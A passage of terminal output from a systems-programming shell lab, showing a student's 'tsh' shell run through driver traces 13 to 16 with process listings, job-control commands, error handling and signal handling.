   8517 pts/0    T      0:00 ./mysplit 4
   8518 pts/0    T      0:00 ./mysplit 4
   8521 pts/0    R      0:00 /bin/ps a
tsh> fg %1
tsh> /bin/ps a
    PID TTY      STAT   TIME COMMAND
   1050 tty2     Ssl+   0:00 /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
   1058 tty2     Sl+    0:11 /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthority -background none -noreset -keeptty -verbose 3
   1385 tty2     Sl+    0:00 /usr/libexec/gnome-session-binary --systemd --systemd --session=ubuntu
   4288 pts/0    Ss     0:00 -/bin/zsh
   8514 pts/0    S+     0:00 /usr/bin/perl ./sdriver.pl -t trace13.txt -s ./tsh -a -p
   8515 pts/0    S+     0:00 ./tsh -p
   8524 pts/0    R      0:00 /bin/ps a

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace14.txt -s ./tsh -a "-p"
#
# trace14.txt - Simple error handling
#
tsh> ./bogus
./bogus: Command not found
tsh> ./myspin 4 &
[1] (8667) ./myspin 4 &
tsh> fg
fg command requires PID or %jobid argument
tsh> bg
bg command requires PID or %jobid argument
tsh> fg a
fg: argument must be a PID or %jobid
tsh> bg a
bg: argument must be a PID or %jobid
tsh> fg 9999999
(9999999): No such process
tsh> bg 9999999
(9999999): No such process
tsh> fg %2
%2: No such job
tsh> fg %1
Job [1] (8667) stopped by signal 20
tsh> bg %2
%2: No such job
tsh> bg %1
[1] (8667) ./myspin 4 &
tsh> jobs
[1] (8667) Running ./myspin 4 &

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace15.txt -s ./tsh -a "-p"
#
# trace15.txt - Putting it all together
#
tsh> ./bogus
./bogus: Command not found
tsh> ./myspin 10
Job [1] (8686) terminated by signal 2
tsh> ./myspin 3 &
[1] (8688) ./myspin 3 &
tsh> ./myspin 4 &
[2] (8690) ./myspin 4 &
tsh> jobs
[1] (8688) Running ./myspin 3 &
[2] (8690) Running ./myspin 4 &
tsh> fg %1
Job [1] (8688) stopped by signal 20
tsh> jobs
[1] (8688) Stopped ./myspin 3 &
[2] (8690) Running ./myspin 4 &
tsh> bg %3
%3: No such job
tsh> bg %1
[1] (8688) ./myspin 3 &
tsh> jobs
[1] (8688) Running ./myspin 3 &
[2] (8690) Running ./myspin 4 &
tsh> fg %1
tsh> quit

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace16.txt -s ./tsh -a "-p"
#
# trace16.txt - Tests whether the shell can handle SIGTSTP and SIGINT
#     signals that come from other processes instead of the terminal.
#
tsh> ./mystop 2
Job [1] (8704) stopped by signal 20
tsh> jobs
[1] (8704) Stopped ./mystop 2
tsh> ./myint 2
Job [2] (8707) terminated by signal 2